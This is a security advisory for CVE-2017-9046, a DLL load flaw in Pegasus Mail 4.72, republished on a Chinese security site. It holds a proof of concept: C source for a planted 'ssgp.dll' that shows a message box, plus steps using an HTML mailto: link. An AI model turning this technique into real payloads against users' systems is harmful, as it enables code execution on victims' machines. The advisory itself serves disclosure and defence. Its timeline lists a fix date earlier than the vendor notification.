首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pegasus 4.72 Build 572 Remote Code Execution
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2017-05-22  
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC            
 


Vendor:
=============
www.pmail.com



Product:
=====================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the  mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install. 


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);  
    break;
  }

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.


Our code gets executed...



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=====================================
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mantis Bug Tracker 1.3.10/2.3.
·VMware Workstation for Linux 1
·Secure Auditor 3.0 - Directory
·Linux Kernel 4.11 - eBPF Verif
·Sure Thing Disc Labeler 6.2.13
·MediaWiki SyntaxHighlight Exte
·Microsoft Windows Windows 7/20
·Sync Breeze Enterprise GET Buf
·Microsoft Windows Windows 8/20
·VX Search Enterprise GET Buffe
·Oracle PeopleSoft - XML Extern
·KDE 4/5 - 'KAuth' Privilege Es
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved